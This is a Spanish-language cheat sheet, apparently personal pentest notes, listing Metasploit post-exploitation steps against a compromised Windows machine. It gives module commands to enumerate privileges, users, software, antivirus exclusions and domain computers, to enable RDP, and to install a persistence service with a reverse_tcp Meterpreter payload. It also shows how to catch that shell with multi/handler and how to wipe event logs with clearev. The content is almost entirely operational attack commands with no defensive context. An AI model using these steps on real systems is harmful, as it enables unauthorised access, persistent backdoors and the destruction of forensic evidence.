Enumeracion post explotación #
Enumerar privilegios #
Una vez obtenido acceso a la máquina, podemos ver los privilegios que posee el usuario comprometido.
search win_privs
set SESSION <num>
run
Enumerar usuarios logueados o recientes #
search enum_logged_on_users
set SESSION <num>
run
Enumerar software instalado #
search enum_applications
set SESSION <num>
run
Enumerar exclusiones del antivirus #
search enum_av_excluded
set SESSION <num>
run
Enumerar equipos del dominio (si pertenece a uno) #
search enum_computers
set SESSION <num>
run
Habilitar RDP #
search enable_rdp
set SESSION <num>
run
Persistencia con persistance_service Metasploit #
search platform:windows persistence
### UN BUEN MÓDULO
persistance_service
## utilizamos este payload para el modulo
set payload windows/meterpreter/reverse_tcp
### Para conectarnos a la "persistencia"
## tener cuenta el LHOST Y LPORT configurados en la persistencia para conectarnos usando los mismos datos
use multi/handler
set payload windows/meterpreter/reverse_tcp (el mismo que usamos anteriormente)
set LHOST <eth0 o la que corresponda)
run
Eliminar logs de eventos (Metasploit) #
Teniendo una sesión de meterpreter establecida, metemos el comando:
clearev